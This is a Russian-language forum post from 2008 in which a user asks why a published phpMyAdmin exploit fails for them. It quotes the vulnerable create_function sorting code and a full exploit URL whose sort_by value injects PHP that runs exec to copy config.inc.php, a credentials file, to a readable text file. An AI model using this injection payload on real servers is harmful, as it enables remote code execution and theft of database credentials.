28.09.2008, 14:23
|
|
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925
Репутация:
1348
|
|
Вопрос такой:
Последняя бага в phpMyAdmin (_http://www.securitylab.ru/vulnerability/359583.php):
1) Исходник бажного кода:
Код:
$sort_function = '
return ' . ($sort_order == 'ASC' ? 1 : -1) . ' * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);
';
usort($databases, create_function('$a, $b', $sort_function));
Сам сплоит:
server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec ('cp $(pwd)"/config.inc.php" config.txt');//&sort_order=desc&token=825fdd1c5f1c43a450de3af6f6d 34b22
Бага в принципе понятна - отсуствие фильтрации при использовании переменных в создаваемой функции.
Тем не менне, эта бага нигде не работает. У меня.
Да и еще exec - я понимаю, php, но при чём тут тогда оператор OR?
P.S. magic_quotes=Off
token валидный
__________________
Нельзя считать себя достаточно взрослым, если у тебя школьные фотографии - цифровые.
Последний раз редактировалось 1ten0.0net1; 28.09.2008 в 15:33..
|
|
|